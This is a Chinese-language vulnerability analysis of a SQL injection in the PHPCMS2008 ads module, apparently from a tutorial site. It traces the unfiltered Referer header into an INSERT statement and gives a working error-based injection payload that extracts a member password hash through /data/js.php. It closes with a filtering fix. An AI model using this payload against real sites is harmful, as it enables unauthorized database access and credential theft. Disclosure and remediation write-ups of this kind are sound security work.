function show($placeid)
...
if($adses[0]['option'])
{
foreach($adses as $ads)
{
$contents[] = ads_content($ads, 1);
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
$template = $ads['template'] ? $ads['template'] : 'ads';
}
}
...

sql語(yǔ)句中

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);

這里$this->referrer通過(guò)this方法直接將HTTP請(qǐng)求頭中的referer字段插入到數(shù)據(jù)庫(kù)中,沒(méi)有做任何過(guò)濾措施。(這個(gè)this方法是PHPCMS里面直接封裝的)。

所以現(xiàn)在已經(jīng)找到漏洞點(diǎn)，下一步就是找包含漏洞的用戶(hù)可控的頁(yè)面。如果漏洞是用戶(hù)不可控的，比如只能管理員利用，那就相當(dāng)?shù)碾u肋了。

這里使用回溯的方法，看看哪些頁(yè)面調(diào)用了它。

頁(yè)面/ads/include/commom.inc.php

<?php 
...
require MOD_ROOT.'include/ads_place.class.php';
require MOD_ROOT.'include/ads.class.php';
...
?>

在往上看看誰(shuí)調(diào)用了/ads/include/commom.inc.php

/ads/ad.php文件中

<?php
...
require './include/common.inc.php';
...
?>

ad.php文件為用戶(hù)可控文件，但ad.php有時(shí)不能訪(fǎng)問(wèn)，繼續(xù)向上查找/data/js.php

<?php
chdir(‘../ads/');
require ‘./ad.php';
?>

在用戶(hù)訪(fǎng)問(wèn)首頁(yè)時(shí)，會(huì)調(diào)用js.php，通過(guò)該文件可以提交有害字段，然后通過(guò)逐層調(diào)用，傳入字段referer到危險(xiǎn)方法show，引入SQL注入攻擊。

02 漏洞利用

修改請(qǐng)求頭中的referer字段的話(huà)有很多種，比如burpsuite，Tamper Data…

這里直接使用火狐的Tamper Data進(jìn)行修改：

點(diǎn)擊Start Tamper,然后訪(fǎng)問(wèn)http://your-addr/data/js.php?id=1

這時(shí)候Tamper Data會(huì)跳出來(lái),在右邊框內(nèi)，點(diǎn)擊右鍵，添加一個(gè)element值填寫(xiě)payload

referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#

這里我解釋一下：因?yàn)槁┒吹膕ql語(yǔ)句是INSERT是不回顯的，所以可以使用盲注，這里的payload使用的floor報(bào)錯(cuò)注入。floor報(bào)錯(cuò)注入原理請(qǐng)參考：floor函數(shù)用法

把這個(gè)payload帶入sql語(yǔ)句中是：

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘1',‘$time',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#,'0')”);

03 漏洞修復(fù)

對(duì)相關(guān)字段進(jìn)行過(guò)濾處理。

$referer = safe_replace($this->referer);
$this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';

這里safe_replace是PHPCMS2008封裝的過(guò)濾函數(shù)。

以上所述是小編給大家介紹的PHPCMS2008廣告模板SQL注入漏洞，希望對(duì)大家有所幫助，如果大家有任何疑問(wèn)請(qǐng)給我留言，小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持！

您可能感興趣的文章: